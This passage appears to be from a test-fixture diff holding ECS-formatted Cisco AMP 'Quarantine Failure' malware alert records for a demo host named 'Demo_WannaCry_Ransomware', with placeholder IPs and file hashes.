[ + { + "mac": "02:2f:e0:10:03:5d", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "02:2f:e0:10:03:5d" + ] + }, + "detection_id": "6412680266518626316", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": 
"2021-09-12T17:31:29.843518525Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 
3221225524 + }, + "detection_id": "6419303574240493599", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843520650Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419303574240493597", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843522517Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303569945526295", + 
"event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843524393Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": 
"alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303569945526294", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843526269Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303569945526293", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + 
"10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843528155Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + 
"mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303569945526292", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843558928Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 
pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303569945526291", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843562131Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303569945526288", + 
"event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843564045Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": 
"alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303569945526287", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843565954Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419303574240494000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419303569945526286", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + 
"10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:29.843567900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete 